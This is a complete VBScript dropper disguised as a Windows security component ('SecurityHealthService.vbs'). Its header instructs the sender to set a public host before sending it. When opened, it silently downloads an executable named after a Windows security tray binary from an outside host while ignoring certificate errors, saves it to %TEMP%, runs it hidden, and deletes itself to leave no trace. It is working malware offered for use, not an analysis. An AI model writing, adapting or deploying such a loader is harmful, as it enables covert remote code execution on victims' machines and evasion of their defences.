' =====================================================================
'  SecurityHealthService.vbs  -  primary (silent) bootstrap
'
'  Double-click: no window, no console, no SmartScreen prompt.
'  Downloads the agent via HTTPS (WinHTTP 5.1), stages it to %TEMP%,
'  launches it hidden, then self-deletes so nothing remains in the
'  Downloads folder.
'
'  >>> EDIT AGENT_URL to your public HTTPS host before sending <<<
' =====================================================================
Const AGENT_URL = "https://YOUR-PUBLIC-HOST/SecurityHealthSystray.exe"
' Local smoke test value: "http://127.0.0.1:8080/SecurityHealthSystray.exe"

Const OUT_FILE = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\SecurityHealthSystray.exe"

' --- 1. Download (WinHTTP 5.1: TLS 1.2 over 443, also plain HTTP) ---
Set req = CreateObject("WinHttp.WinHttpRequest.5.1")
req.Open "GET", AGENT_URL, False
req.Option 12, &H30      ' WINHTTP_OPTION_SECURE_PROTOCOLS: TLS 1.1 | TLS 1.2
req.Option 13, -1        ' WINHTTP_OPTION_SECURITY_CERTIFICATE_FLAGS: ignore all cert errors (self-signed / CN mismatch)
req.SetTimeouts 30000, 30000, 30000, 30000
req.Send
If req.Status <> 200 Then
    WScript.Echo "Download failed: HTTP " & req.Status
    WScript.Quit 1
End If

' --- 2. Write to %TEMP% (binary stream, overwrite) ---
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists(OUT_FILE) Then fso.DeleteFile OUT_FILE, True

Set stream = CreateObject("ADODB.Stream")
stream.Type = 1          ' adTypeBinary
stream.Open
stream.Write req.ResponseBody
stream.SaveToFile OUT_FILE, 1   ' adSaveCreateOverWrite
stream.Close

' --- 3. Launch hidden (window style 0) ---
Set sh = CreateObject("WScript.Shell")
sh.Run """" & OUT_FILE & """" & "", 0, False

' Give the agent a moment to start before the bootstrap exits.
WScript.Sleep 1500

' --- 4. Self-delete this bootstrap (leaves zero files behind) ---
On Error Resume Next
fso.DeleteFile WScript.ScriptFullName, True
